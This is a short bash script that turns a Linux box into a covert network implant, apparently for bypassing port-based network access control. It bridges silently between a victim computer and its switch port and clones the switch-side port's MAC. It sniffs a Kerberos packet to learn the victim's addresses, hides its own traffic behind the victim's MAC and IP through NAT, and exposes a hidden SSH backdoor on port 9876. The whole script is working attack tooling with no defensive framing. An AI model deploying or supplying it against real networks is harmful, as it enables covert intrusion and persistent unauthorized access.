#!/bin/bash


#pre populated variables
SWINT=eth0
SWMAC=`ifconfig $SWINT | grep -i hwaddr | awk '{ print $5 }'`
BRINT=br0
COMPINT=eth1
BRIP=169.254.66.66
RANGE=61000-62000
DPORT=9876

#build the bridge
brctl addbr $BRINT
brctl addif $BRINT $COMPINT
brctl addif $BRINT $SWINT

#bring up both sides of the bridge
ifconfig $COMPINT 0.0.0.0 up promisc
ifconfig $SWINT 0.0.0.0 up promisc

# ensure the bridge has the right MAC
macchanger -m $SWMAC $BRINT

#bring up the bridge (transparent)
ifconfig $BRINT 0.0.0.0 up promisc

# force the link to reset
mii-tool -r $COMPINT
mii-tool -r $SWINT

#grab a single tcp port 88 packet destined for the DC (kerberos)
tcpdump -i $COMPINT -s0 -w /boot.pcap -c1 tcp dst port 88 
sleep 15

#set our variables
COMPMAC=`tcpdump -r /boot.pcap -nne -c 1 tcp dst port 88 | awk '{print $2","$4$10}' | cut -f 1-4 -d.| awk -F ',' '{print $1}'`
GWMAC=`tcpdump -r /boot.pcap -nne -c 1 tcp dst port 88 | awk '{print $2","$4$10}' | cut -f 1-4 -d.| awk -F ',' '{print $2}'`
COMIP=`tcpdump -r /boot.pcap -nne -c 1 tcp dst port 88 | awk '{print $3","$4$10}' | cut -f 1-4 -d.| awk -F ',' '{print $3}'`


echo compmac
echo $COMPMAC
echo gwmac
echo $GWMAC
echo comip
echo $COMIP

#start dark
arptables -A OUTPUT -j DROP
iptables -A OUTPUT -j DROP


# bring up the bridge with our bridge IP
ifconfig $BRINT $BRIP up promisc

# creat to source NAT the $COMPMAC 
# for traffic leaving the device
# from the bridge mac address
ebtables -t nat -A POSTROUTING -s $SWMAC -o $SWINT -j snat --to-src $COMPMAC
ebtables -t nat -A POSTROUTING -s $SWMAC -o $BRINT -j snat --to-src $COMPMAC

# a static arp entry four our bogus default gateway
arp -s -i $BRINT 169.254.66.1 $GWMAC

#add our default gateway
route add default gw 169.254.66.1

#use DNAT to map $DPORT to $brip:22
iptables -t nat -A PREROUTING -i br0 -d $COMIP -p tcp --dport $DPORT -j DNAT --to $BRIP:22

# set up the source nat rules for tcp/udp/icmp
iptables -t nat -A POSTROUTING -o $BRINT -s $BRIP -p tcp -j SNAT --to $COMIP:$RANGE
iptables -t nat -A POSTROUTING -o $BRINT -s $BRIP -p udp -j SNAT --to $COMIP:$RANGE
iptables -t nat -A POSTROUTING -o $BRINT -s $BRIP -p icmp -j SNAT --to $COMIP

#start sshd
/etc/init.d/ssh start

#lift radio silence
arptables -D OUTPUT -j DROP
iptables -D OUTPUT -j DROP

#/etc/init.d/openvpn start
